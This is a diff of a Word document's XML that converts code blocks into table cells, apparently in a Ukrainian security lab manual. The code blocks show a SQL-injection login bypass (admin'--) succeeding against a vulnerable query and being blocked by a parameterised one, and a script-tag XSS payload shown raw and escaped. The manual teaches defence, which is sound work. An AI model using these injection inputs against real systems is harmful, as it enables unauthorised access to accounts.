+              <w:t xml:space="preserve">[БЕЗПЕЧНИЙ] Запит: SELECT * FROM users WHERE login=? AND password=?</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">[БЕЗПЕЧНИЙ] Параметри: ('admin'--', 'anything')</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Результат: None</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Ін'єкція заблокована!</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">============================================================</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">ДЕМОНСТРАЦІЯ XSS ТА ЗАХИСТУ</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">============================================================</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Зловмисний ввід: &lt;script&gt;alert("XSS")&lt;/script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Без захисту (HTML): &lt;p&gt;Привіт, &lt;script&gt;alert("XSS")&lt;/script&gt;&lt;/p&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">НЕБЕЗПЕЧНО! Скрипт буде виконано в браузері.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">З екрануванням: &lt;p&gt;Привіт, &amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&lt;/p&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">Безпечно! Скрипт відображається як текст.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">ДЕМОНСТРАЦІЯ SQL-ІН'ЄКЦІЇ</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">============================================================</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">--- Звичайний вхід ---</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">[ВРАЗЛИВИЙ] Запит: SELECT * FROM users WHERE login='admin' AND password='secret123'</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Результат: (1, 'admin', 'secret123', 'admin')</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">--- SQL-ін'єкція: admin'-- ---</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">[ВРАЗЛИВИЙ] Запит: SELECT * FROM users WHERE login='admin'--' AND password='anything'</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Результат: (1, 'admin', 'secret123', 'admin')</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">АТАКА УСПІШНА! Увійшли без пароля.</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">--- Той самий ввід через безпечний метод ---</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">[БЕЗПЕЧНИЙ] Запит: SELECT * FROM users WHERE login=? AND password=?</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">[БЕЗПЕЧНИЙ] Параметри: ('admin'--', 'anything')</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Результат: None</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Ін'єкція заблокована!</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">============================================================</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">ДЕМОНСТРАЦІЯ XSS ТА ЗАХИСТУ</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">============================================================</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Зловмисний ввід: &lt;script&gt;alert("XSS")&lt;/script&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Без захисту (HTML): &lt;p&gt;Привіт, &lt;script&gt;alert("XSS")&lt;/script&gt;&lt;/p&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">НЕБЕЗПЕЧНО! Скрипт буде виконано в браузері.</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">З екрануванням: &lt;p&gt;Привіт, &amp;lt;script&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/script&amp;gt;&lt;/p&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Безпечно! Скрипт відображається як текст.</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:bookmarkEnd w:id="25"/>
     <w:bookmarkEnd w:id="26"/>
@@ -4355,50 +5174,99 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">- Встановити Wireshark (якщо не встановлено)</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Встановити Wireshark (якщо не встановлено)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Запустити захоплення трафіку на основному інтерфейсі</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Відвідати кілька веб-сайтів (HTTP і HTTPS)</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Знайти та проаналізувати HTTP-запити</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Застосувати фільтри для виділення трафіку</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">- Запустити захоплення трафіку на основному інтерфейсі</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- Відвідати кілька веб-сайтів (HTTP і HTTPS)</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- Знайти та проаналізувати HTTP-запити</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- Застосувати фільтри для виділення трафіку</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4419,50 +5287,99 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">- Переглянути поточні правила брандмауера</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Переглянути поточні правила брандмауера</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Створити правило для блокування порту з варіанта</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Створити правило для дозволу порту з варіанта</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Перевірити роботу правил</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Видалити тестові правила</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">- Створити правило для блокування порту з варіанта</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- Створити правило для дозволу порту з варіанта</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- Перевірити роботу правил</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- Видалити тестові правила</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4483,32 +5400,81 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">- Визначити відкриті порти на localhost</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Визначити відкриті порти на localhost</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Ідентифікувати процеси, що прослуховують порти</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Записати результати</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">- Ідентифікувати процеси, що прослуховують порти</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- Записати результати</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4529,41 +5495,90 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="SourceCode"/>
-      </w:pPr>
-      <w:r>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">- Запустити демонстраційний код SQL-ін'єкції</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="SourceCodeTable"/>
+        <w:tblW w:type="dxa" w:w="9637"/>
+        <w:tblInd w:w="0" w:type="dxa"/>
+        <w:tblBorders>
+          <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+          <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        </w:tblBorders>
+        <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+        <w:tblLayout w:type="fixed"/>
+        <w:tblCellMar>
+          <w:top w:type="dxa" w:w="113"/>
+          <w:left w:type="dxa" w:w="113"/>
+          <w:bottom w:type="dxa" w:w="113"/>
+          <w:right w:type="dxa" w:w="113"/>
+        </w:tblCellMar>
+        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="1" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="9637"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="dxa" w:w="9637"/>
+            <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Запустити демонстраційний код SQL-ін'єкції</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Продемонструвати успішну атаку на вразливий код</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Продемонструвати блокування атаки безпечним кодом</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:pStyle w:val="SourceCode"/>
+              <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="auto"/>
+            </w:pPr>
+            <w:r>
+              <w:t xml:space="preserve">- Повторити для XSS</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="0" w:after="0" w:line="120" w:lineRule="exact"/>
         <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
+          <w:sz w:val="4"/>
+          <w:szCs w:val="4"/>
         </w:rPr>
-        <w:t xml:space="preserve">- Продемонструвати успішну атаку на вразливий код</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- Продемонструвати блокування атаки безпечним кодом</w:t>
-      </w:r>
-      <w:r>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="VerbatimChar"/>
-        </w:rPr>
-        <w:t xml:space="preserve">- Повторити для XSS</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -7615,15 +8630,8 @@
     <w:basedOn w:val="Normal"/>
     <w:qFormat/>
     <w:pPr>
-      <w:pBdr>
-        <w:top w:color="BFBFBF" w:space="4" w:sz="4" w:val="single"/>
-        <w:left w:color="BFBFBF" w:space="4" w:sz="4" w:val="single"/>
-        <w:bottom w:color="BFBFBF" w:space="4" w:sz="4" w:val="single"/>
-        <w:right w:color="BFBFBF" w:space="4" w:sz="4" w:val="single"/>
-      </w:pBdr>
-      <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
-      <w:spacing w:after="120" w:before="120" w:line="200" w:lineRule="auto"/>
-      <w:ind w:firstLine="0" w:left="284" w:right="284"/>
+      <w:spacing w:after="0" w:before="0" w:line="200" w:lineRule="auto"/>
+      <w:ind w:hanging="340" w:left="340" w:right="0"/>
       <w:jc w:val="left"/>
     </w:pPr>
     <w:rPr>
@@ -7631,6 +8639,27 @@
       <w:sz w:val="18"/>
       <w:szCs w:val="18"/>
     </w:rPr>
+  </w:style>
+  <w:style w:customStyle="1" w:styleId="SourceCodeTable" w:type="table">
+    <w:name w:val="Source Code Table"/>
+    <w:basedOn w:val="TableNormal"/>
+    <w:qFormat/>
+    <w:tblPr>
+      <w:tblInd w:type="dxa" w:w="0"/>
+      <w:tblBorders>
+        <w:top w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        <w:left w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        <w:bottom w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+        <w:right w:color="BFBFBF" w:space="0" w:sz="4" w:val="single"/>
+      </w:tblBorders>
+      <w:shd w:color="auto" w:fill="F4F4F4" w:val="clear"/>
+      <w:tblCellMar>
+        <w:top w:type="dxa" w:w="113"/>
